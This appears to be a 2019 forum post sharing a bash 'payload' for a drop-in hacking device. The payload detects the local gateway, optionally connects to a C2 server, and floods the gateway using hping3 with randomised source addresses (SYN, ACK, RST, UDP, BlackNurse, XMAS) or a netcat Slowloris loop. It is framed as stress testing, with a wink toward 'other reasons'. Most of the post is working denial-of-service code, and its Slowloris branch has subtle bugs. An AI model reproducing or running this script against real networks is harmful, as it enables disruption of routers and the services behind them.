InfoSecREDD Posted December 30, 2019 Share Posted December 30, 2019 (edited) Flood Gateway (DDoS) This Payload was created to have a automated way to stress test a Router/Gateway at any given moment. Currently it can use SYN/ACK/RST/UDP/BlackNurse/XMAS and SlowLoris Attacks. This potentially DDoS's the connected Gateway to determine if the Router/Gateway can handle being attacked internally. (And other reasons.... 😉) The Code: #!/bin/bash # # Title: Flood Gateway (DDoS) # Author: REDD of Private-Locker # Version: 1.2 # # Description: This payload detects the Gateway IP then proceeds to # flood the Gateway IP by sending SYN/ACK/RST/UDP Packets or using # SLOWLORIS/BlackNurse/XMAS Attacks. (More options to come) # # Common Ports to Attack: 80 (TCP), 8080(TCP), 53 (UDP), 3389 (TCP), the # rest is up to you. # # Defaults to SYN Attack. # # LED SETUP (Magenta) Setting NETMODE and detecting GW IP. # LED Yellow thru Magenta Waiting Ethernet Plug connection. # LED White thru Magenta Waiting Connection to Public Website. # LED Red Blink No Gateway IP Address, waiting 15 seconds. # LED Red Solid No Gateway IP Address, exiting script. # LED Cyan Blink to Solid Connected to C2. (Optional) # LED Yellow thru Green Attacking Gateway IP with Hping3. # LED Green Solid Attack has Finished. # # NOTE: SLOWLORIS Attack does NOT use the DURATION Variable. It runs until # connections/resources run out. # # BlackNurse Attack does NOT use the PORT Variable. It runs against the # ICMP(Ping) port. # # Type of Attack to perform. ATTACK="SYN" # Port to Attack. PORT="80" # Amount of time you wish to DDoS your Gateway. (Hint: 600 seconds is 10 minutes) DURATION="30" # Turn to YES if you want to connect to C2 BEFORE Attack. C2_CONNECTION="YES" ## Settings for SLOWLORIS Attack. (Only supports HTTP Attack, NOT SSL - HTTPS) HTTP_CONNECTIONS="200" TEST_URL="http://www.google.com" # Start the Script! Man your Stations! LED SETUP; NETMODE DHCP_CLIENT; function net_connect() { while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done while ! wget $TEST_URL -qO /dev/null; do LED W SOLID; sleep .2; LED M SOLID; sleep .8; done GATEWAY_IP=$(ip route list dev eth0 | awk ' /^default/ {print $3}') # Detect Gateway IP, if none exit if [ -z $GATEWAY_IP ]; then i=0 for i in {1..15}; do if [ "$i" -le "15" ]; then LED R SOLID; sleep .2; LED OFF;sleep .8; else LED R SOLID; exit 0; fi done fi if [ "$C2_CONNECTION" == "YES" ]; then LED C VERYFAST; C2CONNECT; while ! pgrep cc-client; do LED C FAST;sleep 1; done LED C SOLID; sleep .5; fi } net_connect; # Prepare the Flashy Colors! function led_attack() { LED G SOLID; sleep .2; LED Y SOLID; sleep .8; } function led_attack_dur() { for (( i=1; i<=$DURATION; i++ )); do LED G SOLID; sleep .2; LED Y SOLID; sleep .8; done } # Arm the platoon! function attack() { if [ $ATTACK = "SYN" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -S $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "ACK" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -A $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "RST" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -R $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "UDP" ]; then led_attack; hping3 --flood --udp --sign 4096 -p $PORT $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "BLACKNURSE" ]; then led_attack; hping3 -1 -C 3 -K 3 --flood --rand-source $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "XMAS" ]; then led_attack; hping3 --flood -d 4096 --rand-source -p $PORT -F -S -R -P -A -U -X -Y $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "SLOWLORIS" ]; then led_attack; if [ "$PORT" != "80" ] || [ "$PORT" != "8080" ]; then PORT="80" fi INTERVAL=$((RANDOM % 11 + 5)) i=1 while [ "$i" -le "$HTTP_CONNECTIONS" ]; do # Use Netcat to create a keep-alive connection to the Gateway IP. echo -e "GET / HTTP/1.1\r\nHost: $GATEWAY_IP\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & led_attack; i=$((i + 1)); done fi LED FINISH } # Simple fix for changing arguments to CAPS arg1=$1 ARG_FIX=$( echo "$arg1" | tr '[a-z]' '[A-Z]' ) # Start the Attack! CHHHAAARRRGGGEEE!! if [ "$ARG_FIX" == "ACK" ]; then ATTACK="ACK" attack; elif [ "$ARG_FIX" == "SYN" ]; then ATTACK="SYN" attack; elif [ "$ARG_FIX" == "RST" ]; then ATTACK="RST" attack; elif [ "$ARG_FIX" == "UDP" ]; then ATTACK="UDP" attack; elif [ "$ARG_FIX" == "BLACKNURSE" ]; then ATTACK="BLACKNURSE" attack; elif [ "$ARG_FIX" == "XMAS" ]; then ATTACK="XMAS" attack; elif [ "$ARG_FIX" == "SLOWLORIS" ]; then ATTACK="SLOWLORIS" attack; elif [ -z $1 ]; then # Run ATTACK Variable from beginning of Script. attack; else printf "That is not a correct Packet Attack type.\n\n Supported Types: SYN, ACK, UDP, RST, XMAS, BLACKNURSE and SLOWLORIS\n" exit 1 fi Changelog: 1.2 - - Adds BLACKNURSE/XMAS Attacks to the payload. 1.1 - - Adds UDP/RST/Slowloris Attacks to the payload. 1.0 - Initial Release. Source Code URL: Coming Soon.. Edited January 3, 2020 by REDD Adding 1.2 2 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.